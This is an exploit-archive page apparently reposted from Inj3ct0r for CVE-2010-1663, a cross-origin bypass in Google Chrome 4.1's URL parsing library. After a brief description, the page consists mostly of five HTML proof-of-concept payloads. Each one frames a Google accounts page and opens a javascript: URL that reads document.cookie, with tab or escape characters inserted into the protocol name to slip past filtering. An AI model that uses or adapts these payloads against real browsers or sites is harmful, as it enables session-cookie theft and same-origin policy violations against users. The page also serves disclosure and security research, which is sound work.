Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL

Posted on 19 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================================
Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
===================================================================


#   Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
#
#   CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663
#
#   Author: Jordi Chancel
#
#   Software Link: http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-security-fixes.html
#
#   Description: {
#       The Google URL Parsing Library (aka google-url or GURL) in Google Chrome
#       before 4.1.249.1064 allows remote attackers to bypass the Same Origin Policy
#       via CHARACTER TABULATION or others escape characters inside javascript: protocol string. }
#
#   Some PoC :
 
&lt;iframe name=&quot;test&quot; src=&quot;https://www.google.com/accounts/ManageAccount?hl=fr&quot;&gt;&lt;/iframe&gt;
&lt;a href=&quot;#&quot; value=&quot;test&quot; onclick=&quot;window.open('javascru0009ipt:alert(document.cookie)','test')&quot; &gt;Inject JavaScript&lt;/a&gt;
----
&lt;iframe name=&quot;test&quot; src=&quot;https://www.google.com/accounts/ManageAccount?hl=fr&quot;&gt;&lt;/iframe&gt;
&lt;a href=&quot;#&quot; value=&quot;test&quot; onclick=&quot;window.open('javascrx09ipt:alert(document.cookie)','test')&quot; &gt;Inject JavaScript&lt;/a&gt;
----
&lt;iframe name=&quot;test&quot; src=&quot;https://www.google.com/accounts/ManageAccount?hl=fr&quot;&gt;&lt;/iframe&gt;
&lt;a href=&quot;#&quot; value=&quot;test&quot; onclick=&quot;window.open('javascr
ipt:alert(document.cookie)','test')&quot; &gt;Inject JavaScript&lt;/a&gt;
----
&lt;iframe name=&quot;test&quot; src=&quot;https://www.google.com/accounts/ManageAccount?hl=fr&quot;&gt;&lt;/iframe&gt;
&lt;a href=&quot;#&quot; value=&quot;test&quot; onclick=&quot;window.open('javascr
ipt:alert(document.cookie)','test')&quot; &gt;Inject JavaScript&lt;/a&gt;
----
&lt;iframe name=&quot;test&quot; src=&quot;https://www.google.com/accounts/ManageAccount?hl=fr&quot;&gt;&lt;/iframe&gt;
&lt;a href=&quot;#&quot; value=&quot;test&quot; onclick=&quot;window.open('javascr	ipt:alert(document.cookie)','test')&quot; &gt;Inject JavaScript&lt;/a&gt;
 
Greetz : Xylitol , Eddy Bordi , 599eme Man , Gnouf , CTZ .


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-19]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20